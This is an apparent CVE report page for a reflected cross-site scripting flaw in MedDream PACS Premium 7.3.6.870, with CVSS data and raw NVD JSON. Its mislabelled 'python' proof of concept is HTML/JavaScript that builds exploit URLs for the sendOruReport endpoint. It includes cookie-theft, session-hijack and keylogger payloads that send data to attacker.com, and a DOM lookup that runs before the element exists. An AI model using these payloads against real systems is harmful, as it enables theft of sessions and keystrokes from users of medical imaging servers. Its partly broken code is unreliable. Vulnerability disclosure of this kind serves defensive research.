Security Vulnerability Report
中文
CVE-2025-44000 CVSS 6.1 MEDIUM

CVE-2025-44000

Published: 2026-01-20 15:16:25
Last Modified: 2026-01-29 15:23:25

Description

A reflected cross-site scripting (xss) vulnerability exists in the sendOruReport functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:* - VULNERABLE
MedDream PACS Premium 7.3.6.870及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-44000 PoC - Reflected XSS in MedDream PACS Premium sendOruReport --> <!-- Target: MedDream PACS Premium <= 7.3.6.870 --> <!-- Attack Vector: Malicious URL with XSS payload in sendOruReport parameter --> <!DOCTYPE html> <html> <head> <title>CVE-2025-44000 PoC</title> </head> <body> <h1>CVE-2025-44000 Reflected XSS PoC</h1> <p>Target: MedDream PACS Premium sendOruReport Function</p> <script> // Basic XSS payload to demonstrate vulnerability // This PoC extracts cookies and displays them (for educational purposes only) // Malicious URL construction const baseUrl = 'https://target-server/meddream/'; // Replace with actual target const maliciousParam = '<script>alert(document.cookie)<\/script>'; const exploitUrl = baseUrl + 'sendOruReport?report=' + encodeURIComponent(maliciousParam); // Display the exploit URL console.log('Exploit URL:', exploitUrl); document.getElementById('exploit-url').innerHTML = '<a href="' + exploitUrl + '" target="_blank">Malicious Link</a>'; // More sophisticated payload examples: const payloads = { cookieTheft: "<script>fetch('https://attacker.com/steal?c='+document.cookie)<\/script>", sessionHijack: "<img src=x onerror='new Image().src="https://attacker.com/log?cookie="+document.cookie'>", keyLogger: "<script>document.onkeypress=function(e){fetch('https://attacker.com/k?k='+e.key)}<\/script>" }; // Function to generate custom payload URLs function generatePayloadUrl(payload) { return baseUrl + 'sendOruReport?report=' + encodeURIComponent(payload); } // Display payload options Object.keys(payloads).forEach(name => { console.log(name + ':', generatePayloadUrl(payloads[name])); }); </script> <p>Note: This PoC is for authorized security testing only.</p> <div id="exploit-url"></div> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-44000", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:16:25.160", "lastModified": "2026-01-29T15:23:24.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (xss) vulnerability exists in the sendOruReport functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) reflejado existe en la funcionalidad sendOruReport de MedDream PACS Premium 7.3.6.870. Una URL maliciosa especialmente diseñada puede conducir a la ejecución arbitraria de código javascript. Un atacante puede proporcionar una URL diseñada para activar esta vulnerabilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:*", "matchCriteriaId": "0F239E49-18E8-4DE0-B9B8-C220C3BC0C62"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2270", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2270", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Third Party Advisory"]}]}}